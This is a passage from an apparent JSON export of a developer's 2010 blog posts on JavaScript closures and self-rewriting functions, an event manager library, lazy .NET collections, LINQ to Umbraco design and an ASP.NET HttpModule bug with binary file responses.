"url": "https://www.aaron-powell.com/posts/2010-09-30-javascript-singleton/", "date": "Thu, 30 Sep 2010 00:00:00 +0000", "tags": [ "javascript", "web" ], "description": "Time for more crazy JavaScript, functions that can rewrite themselves!", "content": "Recently I was building a JavaScript application which was quite complex and involved a bit of server interaction with some AJAX requests. The AJAX was just doing some one-time data loading, and the reason I was using AJAX was to lazy-load some of the information on the page.\nSince the methods going back to the server were to be called multiple times and I wanted caching of the server response I needed to have the method a bit aware that the server call had responded and not to do it again. Essentially what I was wanting to do was have a Singleton implemented, but this is really just a method call, so we need to Singleton a method… hmm…\nWell let’s have a look at how to do that.\nFunctions writing functionsLet’s think about what we’re trying to do here, we’re trying to make a function run and then run again but perform a bit differently the next time around, and there’s a few different ways to do this. One of the ways you can do this is with logic branches, if something then ... else ... endif, sure that’s easy, but it’s totally not crazy enough for me, could we do if something then replace function else call original endif? Well the answer is yes, and that’s what we’re going to do, the function is going to rewrite itself during its execution!\nIt’s exploitation I tell you!So what we’re wanting to do is take advantage of the way that JavaScript closure works. I’m not going to go into detail about explaining closure, if you’re interested check this post out, but what we’re going to use is the fact that a variable defined outside a function can be assigned within that function.\nLet’s look at a very basic example:\nvar fn; fn = function() { fn = function() { console.log("I've been replaced!"); }; console.log("Thanks for the call"); }; fn(); //Thanks for the call fn(); //I've been replaced! If you run this in a browser (that supports console.log, eg: Firefox, Chrome and IE9) the first time the function is called you’ll get the output Thanks for the call and then every subsequent call will output I’ve been replaced!.\nAwesome!\nThe reason this works is because we’re creating a variable called fn which we can access within the scope of then fn function body, and because we can access the variable we can reassign it! So when fn runs it rewrites itself, but it has its own function body that it executes.\nThis allows you to do some crazy things, like this:\nvar fn; fn = function() { fn = function() { fn(); }; console.log("Thanks for the call"); }; fn(); //Thanks for the call fn(); //results in a stack overflow I wouldn’t advise this, it’s a good way to make a mess of some code :P. This was more just to illustrate a point.\nReal world scenarioThe example we’ve seen above is fairly sandboxed, it doesn’t really take into account the method being a method of a JavaScript object, doesn’t take into account the AJAX or anything like that. It illustrates the point nicely, but let’s expand on it.\nFirst off let’s create a little JavaScript object to play with:\nmyObject = (function() { var _this; _this = { getData: function(callback) { } };\treturn _this; })(); I’m creating an object called myObject (imaginative I know) that will be sitting at the window level, and had a single public method getData(callback). The method will take a function as an argument which we’ll invoke when the server response is completed. Doing a callback for an AJAX request is an easy way to expose the successful response method without having to expose the AJAX API.\nNow let’s go about implementing the body of the function:\nmyObject = (function() { var _this; _this = { getData: function(callback) { $.ajax({ type: "POST", contentType: "application/json; charset=utf-8", url: '/MyService.asmx/SomeMethod', success: function (data) { _this.getData = function(callback) { callback.apply(_this, [data]); }; callback.apply(_this, [data]); } }); } };\treturn _this; })(); Here we’re using jQuery (it’ll just make it a bit less verbose for the demo) and then we’re calling a web service method, that is all fairly standard, the interesting stuff is within the body of the success property:\nsuccess: function (data) { _this.getData = function(callback) { callback.apply(_this, [data]); }; callback.apply(_this, [data]); } This is the function which jQuery will invoke when the server successfully returns (and we’re assuming that it returns some data). When the method is called we’ll execute the callback (and by using callback.apply we can specify the internal scope of the object, so the this scope will be the myObject).\nAnd like we did in our early example here we’re running a piece of code to rewrite the function when it executes. The thing is that we now have an object, so we can’t use the trick we were using before, instead this time what we’re doing is assigning the method on the object which was created. This is the key point here, if we don’t have a reference back to the object then we can’t reassign it. It is true that this demo could use myObject.getData, since it’s a static method on the object, but I wanted the demo to cover if you are using a class implementation.\nConclusionThat wraps it all up, we’ve see how we can create functions in JavaScript which will rewrite themselves to simulate a Singleton. The ultimate usefulness of this code is up for debate, but it is a good example of how you can do some really funky stuff with JavaScript.\nJust be careful you don’t make your rewriting functions too smart or they may become sentient!\n", "id": "2010-09-30-javascript-singleton" }, { "title": "Overview of the DocumentDataProvider", "url": "https://www.aaron-powell.com/posts/2010-09-30-documentdataprovider-overview/", "date": "Thu, 30 Sep 2010 00:00:00 +0000", "tags": [ "umbraco", "linq-to-umbraco", "linq-to-umbraco-extensions" ], "description": "What is the DocumentDataProvider, why does it exists, and how can it complete me?", "content": "##Overview\nIf you’ve read my article on Understanding LINQ to Umbraco (and if you haven’t you really should go do that) you’ll know that LINQ to Umbraco does have the scaffolding for doing full CRUD operations. But with CRUD it is up to the underlying UmbracoDataProvider implementation to support.\nBecause the OOTB UmbracoDataProvider instance, the NodeDataProvider is only concerned with how to access the in-memory cache so having full CRUD doesn’t make sense.\nThis is where the DocumentDataProvider fits in; like its name suggests it is designed to work with the Umbraco Document API, which is responsible for performing CRUD operations. So the ultimate goal of the DocumentDataProvider will be to provide full CRUD operations against the Umbraco database.\nDocumentDataProvider vs NodeDataProvider So if the goal of the DocumentDataProvider is to provide full CRUD where will that leave NodeDataProvider? Well they should still sit side-by-side. For your common usage you should still use the NodeDataProvider, this will only be interacting with published content, and the in-memory cache. The DocumentDataProvider on the other hand will be interacting with the Document API, this means that it’ll be tied to the SQL instance, and doing read operations will suffer from the same performance limitations that you can find from the Document API. There will be caching built into the DocumentDataProvider, but by-and-large there will be limits to how that can help.\n", "id": "2010-09-30-documentdataprovider-overview" }, { "title": "Using Lazy with KeyedCollection", "url": "https://www.aaron-powell.com/posts/2010-09-22-lazy-keyedcollections/", "date": "Wed, 22 Sep 2010 00:00:00 +0000", "tags": [ ".net", "collections" ], "description": "How to create and return KeyedCollection which use Lazy under the hood", "content": "For a project which I’m currently working on I’ve got a few custom collections which I need to return from various methods on a data repository. There’s a bit of heavy lifting that is done in each of the repository methods so I wanted to have a way which each of them could be lazy loading the items into the collection. This would also mean that if you’re only wanting a subset of the collection you don’t create all the objects.\nSince the collections are representing a data model I decided that I’d go with the KeyedCollection, as it’s a well designed collection for what I need, similar to a List but had a key for each item. And since we’re representing a data model having a key is important.\nThere’s a handy class in the .NET 4.0 framework which I wanted to use, Lazy<T> which is handy as it takes a lambda statement into the constructor so that I defer the object creation.\nIntroducing KeyedCollection If you haven’t worked with KeyedCollection before it’s quite a handy class. It’s an abstract class so you have to implement it when ever you want to use it. The reason for this is that you have to implement a method called GetKeyForItem which tells the collection how to resolve the key for each item. This is where KeyedCollection differs from the Dictionary class; for a Dictionary you need to pass in the key value each time.\nI’m sure you can see the advantage of the KeyedCollection now for what I’m doing, it can reduce code smell quite nicely.\nGetting Lazy So let’s get started with making a collection which is lazy and we’ll have a look at something which tripped me up when implementing it.\nFor the purpose of this blog I’ve got some stubbed out classes that could represent a data entity, one called Id:\nclass Id { public string Alias { get; set; } public string Name { get; set; } } This will be the key in our collection, and an Entity class:\nclass Entity { public Id Id { get; set; } public DateTime CreatedDate { get; set; } } We’ll be creating an implementation of KeyedCollection and lets start with our basic class:\nclass LazyKeyedCollection<T> : KeyedCollection<Id, Lazy<T>> where T : Entity { protected override Id GetKeyForItem(Lazy<T> item) { throw new NotImplementedException(); } } In this implementation I’ve made the collection a generic so that you can sub-class out the Entity object (which is likely if we were implementing this into a full-scale application, as I’m doing). You’ll notice that KeyedCollection actually is KeyedCollection<Id, Lazy<T>>, which is wrapping our generic argument into the Lazy object.\nAs I mentioned above we need to implement a method which tells it how we’re going to get the key from the object (our Entity), so let’s implement that:\nprotected override Id GetKeyForItem(Lazy<T> item) { //access the real item from the lazy object return item.Value.Id; } So here’s how the collection object will determine what is the key is for each item. But we’re after something that’s happening in a lazy fashion, so let’s write a little application to use it and we’ll make sure that it is lazy like we expect:\nclass Program { static void Main(string[] args) { var range = Enumerable.Range(0, 10); var lkc = new LazyKeyedCollection<Entity>(); foreach (var item in range) { var i = item; Console.WriteLine("Adding item " + i + " to LazyKeyedCollection"); lkc.Add(new Lazy<Entity>(() => { var e = new Entity(); e.Id = new Id { Alias = i.ToString(), Name = "LazyKeyedCollection item " + i }; e.CreatedDate = DateTime.Now; Console.WriteLine("Created entity '" + e.Id.Name + "'"); return e; })); } } } Adding item 0 to LazyKeyedCollection\nCreated entity ‘LazyKeyedCollection item 0’\nAdding item 1 to LazyKeyedCollection\nCreated entity ‘LazyKeyedCollection item 1’\nAdding item 2 to LazyKeyedCollection\nCreated entity ‘LazyKeyedCollection item 2’\nAdding item 3 to LazyKeyedCollection\nCreated entity ‘LazyKeyedCollection item 3’\nAdding item 4 to LazyKeyedCollection\nCreated entity ‘LazyKeyedCollection item 4’\nAdding item 5 to LazyKeyedCollection\nCreated entity ‘LazyKeyedCollection item 5’\nAdding item 6 to LazyKeyedCollection\nCreated entity ‘LazyKeyedCollection item 6’\nAdding item 7 to LazyKeyedCollection\nCreated entity ‘LazyKeyedCollection item 7’\nAdding item 8 to LazyKeyedCollection\nCreated entity ‘LazyKeyedCollection item 8’\nAdding item 9 to LazyKeyedCollection\nCreated entity ‘LazyKeyedCollection item 9’\nOh crap, look at that, we’re evaluating the lambda expression way to early, in fact it’s happening as soon as we add the item into the collection. That doesn’t sound very lazy now does it?\nSo why did this happen? Well the problem is the GetKeyForItem method. Because we have to tell the collection how to find the key it has to create the object before it can resolve the key! Well shit, that’s not good, we’re completely missing the point of creating a lazy collection.\nThis is where I got tripped up in my implementation, so I needed to find another way around what I was doing…\nGetting Lazier We’ve got a problem, we need to know the ID of the object, but we don’t want to create the object. So how to do this… We’ll do a different implementation of our lazy collection:\nclass LazyKeyedCollectionMark2<T> : KeyedCollection<Id, KeyValuePair<Id, Lazy<T>>> where T : Entity { protected override Id GetKeyForItem(KeyValuePair<Id, Lazy<T>> item) { throw new NotImplementedException(); } } There’s a very subtle change in this implementation, now the value type argument of the KeyedCollection is no longer just Lazy<T> but instead it is KeyValuePair<Id, Lazy<T>> and this means that our implementation of GetKeyForItem is refactored to look like this:\nprotected override Id GetKeyForItem(KeyValuePair<Id, Lazy<T>> item) { return item.Key; } Well now our item object already knows about the key without having to request it from our lazy object, so this should be nice and easy to work with, let’s add test it to make sure that we’re really lazy with this new code:\nvar lkcm2 = new LazyKeyedCollectionMark2<Entity>(); foreach (var item in range) { var i = item; Console.WriteLine("Adding item " + i + " to LazyKeyedCollectionMark2"); Id id = new Id { Alias = i.ToString(), Name = "LazyKeyedCollectionMark2 item " + i }; lkcm2.Add(new KeyValuePair<Id, Lazy<Entity>>(id, new Lazy<Entity>(() => { var e = new Entity(); e.Id = id; e.CreatedDate = DateTime.Now; Console.WriteLine("Created entity '" + e.Id.Name + "'"); return e; }))); } And what does it output:\nAdding item 0 to LazyKeyedCollectionMark2\nAdding item 1 to LazyKeyedCollectionMark2\nAdding item 2 to LazyKeyedCollectionMark2\nAdding item 3 to LazyKeyedCollectionMark2\nAdding item 4 to LazyKeyedCollectionMark2\nAdding item 5 to LazyKeyedCollectionMark2\nAdding item 6 to LazyKeyedCollectionMark2\nAdding item 7 to LazyKeyedCollectionMark2\nAdding item 8 to LazyKeyedCollectionMark2\nAdding item 9 to LazyKeyedCollectionMark2\nFantastic! We’re not creating the object when we’re adding it to the collection, and that’s what we wanted to see. Now let’s test iterating through the collection, and just output the CreatedDate property:\nforeach (var item in lkcm2) { Console.WriteLine(item.Value.Value.CreatedDate.ToString("hh:mm:ss.ffffzzz")); } Eww, that’s ugly, cuz we’re getting back a KeyValuePair object we have to grab out the through the Value property, and then cuz we’ve still got our Lazy<T> object we have access its Value property. This has really added some code-smell back in so let’s see if we can clean it up a bit. We’ll override the GetEnumerator of our collection:\npublic new IEnumerator<T> GetEnumerator() { foreach (var item in this.Dictionary.Values) yield return item.Value.Value; } Now we’ll be getting back the actual instance of T rather than our double-wrapped version of it. Now our foreach looks like this:\nforeach (var item in lkcm2) { Console.WriteLine(item.CreatedDate.ToString("hh:mm:ss.ffffzzz")); } And the result looks like this:\nCreated entity ‘LazyKeyedCollectionMark2 item 0’\n09:23:59.1277+10:00\nCreated entity ‘LazyKeyedCollectionMark2 item 1’\n09:23:59.1807+10:00\nCreated entity ‘LazyKeyedCollectionMark2 item 2’\n09:23:59.1827+10:00\nCreated entity ‘LazyKeyedCollectionMark2 item 3’\n09:23:59.1847+10:00\nCreated entity ‘LazyKeyedCollectionMark2 item 4’\n09:23:59.1857+10:00\nCreated entity ‘LazyKeyedCollectionMark2 item 5’\n09:23:59.1877+10:00\nCreated entity ‘LazyKeyedCollectionMark2 item 6’\n09:23:59.1887+10:00\nCreated entity ‘LazyKeyedCollectionMark2 item 7’\n09:23:59.1907+10:00\nCreated entity ‘LazyKeyedCollectionMark2 item 8’\n09:23:59.1907+10:00\nCreated entity ‘LazyKeyedCollectionMark2 item 9’\n09:23:59.1927+10:00\nAnd you can see from the time stamp we’re not creating each object until it’s requested from the collection. This means that if we were to grab a subset we’d not have some of the created at all!\nConclusion Here we’ve looked at how to use the KeyedCollection and Lazy<T> to create a lazy loaded collection which we can work with, and how we can ensure that the collection items are lazy loaded at time of enumeration.\nYou can grab the source from this blog post off my bitbucket.\nFootnote Although this implementation works it’s not without drawbacks. If you’re wanting to use LINQ you’ll find that it works a little bit differently, you need to have an *explicit implementation of IEnumerable<T>, so you can replace the one which is defined by the superclass. This is all the committed code.\nYou’d be much better off doing an implementation of IDictionary and IList on the same object, rather than trying to work with KeyedCollection. Because of the way the .NET framework classes implements the IEnumerable interface it’s a lot harder to get access to the methods (they aren’t virtual) so to override them you have to do your own explicit implementations of the interface and use the new keyword when you can.\n", "id": "2010-09-22-lazy-keyedcollections" }, { "title": "An EventManager in JavaScript", "url": "https://www.aaron-powell.com/posts/2010-09-12-javascript-eventmanager/", "date": "Sun, 12 Sep 2010 00:00:00 +0000", "tags": [ "javascript", "javascript-eventmanager", "web" ], "description": "Having disconnected eventing in JavaScript using a simple little framework", "content": "Overview Previously I’ve blogged about Client Event Pool’s (yes I know the images are broken), but that example was intrinsically tied to Microsoft AJAX and I wanted to have one which was separate from it.\nSo I decided to create an object that resides at slace.core.eventManager which will achieve this.\nNote: This library has a dependency on the slace.core library.\nThis API allows you to bind events, trigger events, unbind events (and event handlers) and event check if an event handler is registered.\nThis is all possible without having to explicitly tie each object to the objects which need to know about the events it’s firing. To fully understand the idea behind the Client Event Pool concept I suggest you read my previous article and its references.\nBinding events The concept of binding to an event is handy if you’ve got code on a page that you want to run when a certain event will be completed (although the code may also be run by other means), and to do this there is a simple method which works like this:\n1 slace.core.eventManager.bind('some event', function() { ... }); This will put that handler there so that if any code that triggers (raises) the ‘some event’ event the handler you specify will be executed.\nYou can call bind as many times as you like, adding as many handlers as you want.\nOne thing that can be handy (if you need to add/ remove events programmatically) is the ability to provide a unique ID to an event handler, to do that it’s a third argument to the bind method:\n1 slace.core.eventManager.bind('some event', function() { ... }, 'awesome-event'); This will give the identifier of ‘awesome-event’ to the function you provided (we’ll look at how this is handy shortly)\nHow it works Here’s the code that makes up bind:\n1 2 3 4 5 6 7 8 bind: function (name, fn, eventHandlerId) { var e = getEvent(name); if (!eventHandlerId) { eventHandlerId = name + '-' + (e.length + 1); } fn.id = eventHandlerId; e.push(fn); } I’ve omitted the getEvent method as it’s not important, look into the real source for it\nWhat it does is check if you gave a unique ID, and if you didn’t then I’ll create one based off of the name of the event and the position in array of handlers and then it’s assigned to the id property of the function object and adds it to the array of handlers.\nTriggering events If you’re binding to events you’re probably going to want to be raising them as well, and this is what the trigger method is for and it works similarly to .NET events, like so:\n1 slace.core.eventManager.trigger("some event"); When triggering an event you need to provide it the name of the event to trigger (eg: ‘some event’). Additionally there are two more arguments, with the full method call looking like this:\n1 slace.core.eventManager.trigger("some event", source, args); If you’ve been doing much JavaScript work you’ll be familiar with just how much fun scope can be in JavaScript, well with the trigger method, you’re able to specify what object you want to be scoped as the this object in the method when it runs. This is the 2nd argument to the trigger method.\nLastly you can pass in arguments you want for the event handlers. If your handlers are to accept multiple arguments then you need to pass in an array, but I’d suggest just passing in an object literal each time, it’s a lot more flexible than multiple arguments :P.\nThe most common reason I’ve needed to use this is to work nicely with AJAX requests, rather than having to pass in call-back methods ;).\nHow it works Here’s the code:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 trigger: function (name, source, args) { if (!source) { source = {}; } if (!args) { args = []; } var evt = getEvent(name); if (!evt || (evt.length === 0)) { return; } evt = evt.length === 1 ? [evt[0]] : Array.apply(null, evt); if (args.constructor !== Array) { args = [args]; } for (var i = 0, l = evt.length; i < l; i++) { evt[i].apply(source, args); } } First off I do a few things like making sure you’re passing in an object for the sender (or I’ll default it to an empty one) and some arguments (which will become an empty array if it’s not there).\nNext I get the event by name and make sure there are some handlers to run.\nIf there are some handlers it’ll just do a check to make sure that it’s an array that we’ll be working with for the handlers, ensure that the arguments are an array (if it’s not the code will break during the apply method, since you have to pass an array as the 2nd argument to it) and then we iterate through all the handlers in the order they were added, setting the scope to what was specified.\nProgrammatically playing with events In addition to bind and trigger there are two methods which are handy if you’re trying to work with events easily.\nAs I mentioned for the bind method you can pass in an ID for the event handler, well the ID can be used to remove the event:\n1 slace.core.eventManager.unbind("some event", "my-event"); What this will do is iterate through all the registered handlers and if one matches with the ID you’ve provided then it’ll remove it from the handler collection.\nIf you want to get rid of all the event handlers you can just omit the handler ID and it’ll clear all the handlers for that event.\nAnother useful feature of the eventManager is that it allows you to check if an event is already registered. If you had a named function that you want to bind to an event you should check to make sure it hasn’t already been registered, eg:\n1 slace.core.eventManager.isRegistered("some event", "my-event"); This will return true or false depending on whether the ID you’re providing matches a handler registered in that event.\nYou could use it like this:\n1 2 3 4 5 6 7 function myMethod() { ... } /* ... */ if(!slace.core.eventManager.isRegistered('some event', 'myMethod')) { slace.core.eventManager.bind('somme event', myMethod); } Sure it’s a sandboxed example but it should give you an idea.\nSource Code You can grab the full source code for the eventManager from the project on bitbucket, which is here: http://bitbucket.org/slace/javascript-tools/src/tip/JavaScriptTools/Scripts/slace.core.eventManager.js\n", "id": "2010-09-12-javascript-eventmanager" }, { "title": "Core JavaScript library", "url": "https://www.aaron-powell.com/posts/2010-09-12-slace-core-javascript-library/", "date": "Sun, 12 Sep 2010 00:00:00 +0000", "tags": [ "javascript", "web" ], "description": "A core JavaScript library from my JavaScript Tools", "content": "Overview This library is really just a core set of features which don’t really belong to any particularly category, and I find a handy for common use in all JavaScript I write.\nRegistering Namespaces Something that I do a lot of in JavaScript is create namespaces. I always like to keep all code in a single namespace in the same manner which I would do with .NET. But there is a problem, JavaScript doesn’t have namespaces!\nI’m sure everyone has written their own code to register namespaces. The code that I use is actually someone I worked with adapted from some code that I’d written as I thought you had to be able to use recursive functions to do it and he was just quicker to getting it written than I was :P.\nUsage The method resides within my core API namespace, slace.core as a method named registerNamespace, like so:\nslace.core.registerNamespace('some.namespace'); This will create a new namespace starting at the window object, but it also has the capabilities to add the namespace from any existing namespace, eg:\nslace.core.registerNamespace('web', slace); Now the slace object will also have web to go with core.\nUnderstanding Namespaces in JavaScript As I mentioned above JavaScript doesn’t have the concept of namespaces, so how do you create a namespace in a language which doesn’t do namespaces?\nWell namespaces in JavaScript are actually a bit of a trick, and they aren’t namespaces which are familiar to .NET developers, they are actually just a series of empty objects.\nTake this piece of code:\nslace.core.registerNamespace('slace.web.controls'); This will produce the following object:\nslace = { web = { controls = {\t} } }; Well technically the window object should be before slace but it’s skipped for brevity, as is the slace.core object\nSo this is really just a set of empty objects!\nLooking into the code So you can find the code here, and let’s have a look at what it does. The crux of it is a recursive function which the namespace is passed into:\nslace.core.registerNamespace = function (namespace, global) { var go; go = function (object, properties) { if (properties.length) { var propertyToDefine = properties.shift(); if (typeof object[propertyToDefine] === 'undefined') { object[propertyToDefine] = {}; } go(object[propertyToDefine], properties); } }; go(global || (function () { return this; })(), namespace.split('.')); } In this function the argument object is what we’re putting the namespace onto, with properties is an array of the namespace to define (having been split on the .).\nThe last line initiates the function and either passes in the object you want to augment, or the object which is scoped as this for the method (which will be window unless you’re really going to get nasty with JavaScript, but that’s a topic for another time :P).\nFun fact This code can actually be reduced by a few lines by making it a self-executing named function (or a self-executing anonymous function if you want ;)), but due to limitations in the Visual Studio 2010 JavaScript intellisense engine it doesn’t work recursively it seems. Odd bug, but easy to get around (and it makes your code a bit more readable!).\nBase Extensions The library also includes some handy extensions for detecting if a method already registered on an object, in the form of Function.method (which is from Douglas Crockford’s article on JavaScript Inheritance), and the Array.prototype is also augmented to have Array.contains, Array.remove and Array.indexOf (unless it’s already there).\n", "id": "2010-09-12-slace-core-javascript-library" }, { "title": "JavaScript Tools", "url": "https://www.aaron-powell.com/posts/2010-09-12-javascript-tools/", "date": "Sun, 12 Sep 2010 00:00:00 +0000", "tags": [ "javascript" ], "description": "The home of JavaScript tools I have produced", "content": "Overview I’ve been doing a lot of JavaScript development of recent, and I’ve always had a soft spot of JavaScript so it was only natural that I keep doing the same things over and over again. As I found that I was doing similar tasks continuously I decided to start working on my own little JavaScript toolbox.\nAnd since I’m doing these things again and again I thought it would be likely that there is one person out there who is doing it as well so I decided that I would release the toolkit I’ve been building for free.\nSo this is the landing page for the different articles around the different libraries in my JavaScript Tools.\nComponents Core library EventManager Unit Testing (Coming soon!) Source Code I’ve decided to release the source code for this as open source. It’s hosted using Mercurial on my BitBucket account. You can grab it here http://hg.slace.biz/javascript-tools and feel free to use it, fork it or contribute to it :).\nLicence I’ve decided to license the JavaScript tools under the MIT license: http://bitbucket.org/slace/javascript-tools/src/tip/JavaScriptTools/LICENSE.txt\n", "id": "2010-09-12-javascript-tools" }, { "title": "Why no IQueryable in LINQ to Umbraco?", "url": "https://www.aaron-powell.com/posts/2010-09-06-iqueryable-linq-to-umbraco/", "date": "Mon, 06 Sep 2010 00:00:00 +0000", "tags": [ "umbraco", "linqtoumbraco" ], "description": "Why does LINQ to Umbraco not implement the IQueryable interface?", "content": "In the theme of blogs answering questions which aren’t being asked I though I would have a bit of a look at why LINQ to Umbraco isn’t an IQueryable-based LINQ implementation.\nWith a previous article I covered Understanding LINQ to Umbraco, but the topic of IQueryable wasn’t in it, partially because it’s an involved topic.\nSo let’s have a look at why LINQ to Umbraco isn’t using IQueryable.\n##Understanding IQueryable\nTo understand why we’re not using IQueryable we need to have a bit of an understanding of IQueryable. IQueryable is a super-set of IEnumerable, allowing you to inspect what query is being and transform it into your underlying query language.\nThis is why it is good for something like LINQ to SQL or Entity Framework. You can take the strongly typed version of the query (expression tree), generated in C# or VB.Net, and then pull it apart and turn it into SQL.\nSo this is quite a handy feature if you have an underlying query language which you want to work against.\nBut this can also cause some problems, if you’re not careful, one of the biggest hurdles is performance.\nSince IQueryable requires transforming your expression tree into the “real” language, executing it and then turning the resulting dataset back into the .Net types required you can loose a bit in performance. You can’t not have performance drawbacks from this.\n##The decision in Umbraco\nSo while building LINQ to Umbraco we did analysis of what the most common use for it would be, and that would be as an alternative to the NodeFactory API. This meant working with the XML cache, and the question is would there be a benefit to IQueryable. Ultimately it turned out that the answer to that is no. With .NET 3.5 it was apparent that the LINQ to XML API was the way which Microsoft was going to go with for working with XML, but that had an inherit problem. LINQ to XML is actually an implementation of IEnumerable, not IQueryable. This means that implementing IQueryable in LINQ to Umbraco would be having to translate the IQueryable queries into IEnumerable queries.\nThis isn’t that hard a task (it just requires compiling the expression tree), but you’d be loosing quite a bit of performance. It was a lot quicker to work with in-memory collections, rather than trying to “lazy load” the XML into LINQ to Umbraco objects.\nIt is true though that this can have memory issues, and still have performance problems especially if you’re working a really large website. But analysis shows that the majority of sites are of a size that the performance loss of IQueryable would be less than the in-memory implementation.\n##The other problem…\nThere’s one other problem with using IQueryable, it’s a huge thing to implement. We wanted LINQ to Umbraco to be fully featured, but to achieve that you have to think about what expression tree branches are going to be covered. Take this query for example:\nvar pages = from page in ctx.TextPages where page.BodyText.Contains("Umbraco") select page; So to implement this you need to:\nLook at the type you require Find the BodyText property Look at the method invocation to string.Contains Find the argument being passed to string.Contains Select the items back into LINQ to Umbraco types And that’s just a basic query, imagine:\nJoin statements GroupBy Ordering Multi-conditional Where clauses There’s a lot of things which can be done with LINQ, and that’s not to mention handling CLR methods, simple arithmetic operators, etc. Writing a fully-fledged IQueryable provider is a big task!\n##Conclusion\nSo this was just a bit of a look as to why we didn’t go the route of IQueryable for LINQ to Umbraco.\nBut if you’re really keep, you can implement IQueryable yourself when you’re writing your own custom LINQ provider, who knows, I might even look at that at some point ;).\n", "id": "2010-09-06-iqueryable-linq-to-umbraco" }, { "title": "Using HttpCompression libraries and ASP.NET MVC FileResult", "url": "https://www.aaron-powell.com/posts/2010-08-30-http-compression-mvc-fileresult/", "date": "Mon, 30 Aug 2010 00:00:00 +0000", "tags": [ "asp.net-mvc", "clientdependency", "umbraco" ], "description": "An interesting quirk I found from ClientDe", "content": "While working on some improvements around the way the styles are handled on my blog (and so they don’t get trashed whenever I update the code with that of the main repository) I decided that I would use ClientDependency to handle this.\nIt was quite easy, I added ClientDependency in, re-configured the Views to use it and refactored the CSS so that it was possible to have my CSS along side the other CSS.\nAll was well and good until I noticed a problem, all the images on my blog were no longer working, they were coming up as broken images. That’s not good, I kind of need them… So I did a bit more investigation, all the download links were also broken. Ok, that’s really not good…\nI rolled back source control and it seemed that everything was working just fine before I added ClientDependency, but ClientDependency shouldn’t have any effect on downloads… Should it?\nSo I did some digging, I was doing everything that should have been done to return a file, hell, it was even more basic than you’d expect:\npublic virtual ActionResult Render(string path) { if (_fileRepository.IsFile(path)) { var fullPath = _fileRepository.MapPath(path); return File(fullPath, _mimeHelper.GetMimeType(fullPath)); } return Redirect("/"); } That looks fine right… right?! Yes, that is fine :P\n##Hunting for bugs\nWell it was time to start finding the problem, and I had a feeling this was going to be a doosy. I started by disabling ClientDependency and then the images did start working (although my CSS fell apart…), so I was 100% convinced that the problem was with it, but what could it be, I’m working with binary files here, not CSS.\nSo I crack out my debugger and start stepping through the ClientDependency source and what I first notice is that I don’t know anywhere near as much about it as I would have like to! Eventually I find something a little bit off. Because ClientDependency runs as a HttpModule it fires for the request of the image, well that’s my first red-flag. And I start worrying, if it’s having the image through its pipeline maybe it’s doing something it shouldn’t be.\nThe next thing I start looking for is a check of the content type, hoping that it’s ignoring the image request… but no joy.\nIn fact, that’s exactly the problem! The way ClientDependency works is that it adds a filter to the HttpRequest which processes the contents of the page and then in-turn transforms it in the manner of which we require. The problem is, it didn’t ignore the image content type, in fact it turned it into a string, processed it and returned the original string, but now it was no longer a binary object.\nCock…\n##He’ll be making a ContentType and checking it twice\nSo this is a very obvious problem, we’re not ignoring the images, we’re treating their request as though it is any text/plain request, so I put in a conditional check to ignore the image requests, drop it into my blog and hit refresh. But still no joy… I check again that I did put the line of code in, attach the debugger and spin it off.\nTo my surprise though the content type property of my response is not image/png as I expected it expected it to be, but instead it’s text/plain. Err, WTF? I spin up Charles and check, nope, Charles is saying that it’s image/png in the browser. I spin up PowerShell and write a simple web request script, again it’s telling my image/png. Well why the hell is the HttpModule telling me otherwise?\n###An event by any other name…\nSo I start doing some research and realise that we’re using the event HttpApplication.PreRequestHandlerExecute to do the transform, but fun fact is that this is too early in the request life cycle. At this point the Request object is populated, but it’s not been handled, so the object doesn’t have the appropriate ContentType set.\nAfter a bit more research I fine a better event to suite my needs, HttpApplication.PostRequestHandlerExecute, and this is the one recommended when doing filters against the HttpResponse.\nNow my ContentType property is set up and I can do checking against it, and the fix now works nicely (there currently isn’t a ClientDependency release available with this fix yet, so if you need it you’ll have to grab it from the source).\n##A word of caution\nThe reason I’ve made this post is to bring this oversight to peoples attention. While doing the research to fix this problem I looked at a few different libraries which add custom filters (either to remove whitespace, or to gzip responses, etc) and I didn’t find any of them doing content type checking of the response. Generally speaking you shouldn’t need to do this, and in the past it’s not really been needed as it wasn’t as common place to have ASP.NET web applications actually return a file. But with the advent of MVC and the easy in which you can use FileResult it’s something to watch out for.\nThere’s nothing wrong with using HttpModule’s to compress your response, clean up your HTML or run what ever other filter you may desire, but make sure you’re using one that understands that not everything running through the ASP.NET life cycle can be handled as a string ;).\n", "id": "2010-08-30-http-compression-mvc-fileresult" }, { "title": "A LINQ observation", "url": "https://www.aaron-powell.com/posts/2010-08-28-a-linq-observation/", "date": "Sat, 28 Aug 2010 00:00:00 +0000", "tags": [ ".net", "linq" ], "description": "", "content": "Well I’m making good headway with LINQ to Umbraco, in the next few days I’ll be doing a very interesting check in (which I’ll also blog here about). My tweet-peeps already have an idea of what it entails, but there’s a bit of a problem with it still which I want to address before the commit.\nAnd that problem has lead to an observation I made about LINQ, well, about Expression-based LINQ (ie - something implementing IQueryable, so LINQ to SQL, or LINQ to Umbraco, etc).\nI’ll use LINQ to SQL for the examples as it’s more accessible to everyone.\nTake this LINQ statement (where ctx is an instance of my DataContext):\nvar items = ctx.Items; That statement returns an object of Table<Item>, which implements IQueryable<T>, IEnumerable<T> (and a bunch of others that are not important for this instructional). So it’s not executed yet, no DB query has occurred, etc. Now lets take this LINQ statement:\nvar items2 = from item in ctx.Items select item; This time I get a result of IQueryable<Item>, which implements IQueryable<T> (duh!) and IEnumerable<T> (and again, a bunch of others).\nBoth of these results have a non-public property called Expression. This reperesents the expression tree which is being used to produce our collection. But here’s the interesting part, they are not the same. That’s right, although you’re getting back basically the same result, the expression used to produce that result is really quite different.\nThis is due to the way the compiler translates the query syntax of LINQ into a lambda syntax. In reality the 2nd example is equal to this:\nvar items2 = ctx.Items.Select(item => item); But is this really a problem, what difference does it make? In the original examples you actually get back the same data every time. You’ll have slightly less overhead by using the access of Table<T> rather than IQueryable<T>, due to the fact that you’re not doing a redundant call to Select. But in reality you would not notice the call.\nThis has caused a problem for me as my direct-access lambda syntax fails my current unit test, where as the query syntax passes. Now to solve that problem! ;)\n", "id": "2010-08-28-a-linq-observation" }, { "title": "Not getting DropDownList value when setting it via JavaScript", "url": "https://www.aaron-powell.com/posts/2010-08-28-no-value-when-settings-dropdown-with-javascript/", "date": "Sat, 28 Aug 2010 00:00:00 +0000", "tags": [ "javascript" ], "description": "", "content": "So today I had a problem which was doing my head in. I had a form which has a bunch of DropDownLists on it, some of which are disabled (depending on the radio button selection). Regardless of whether the 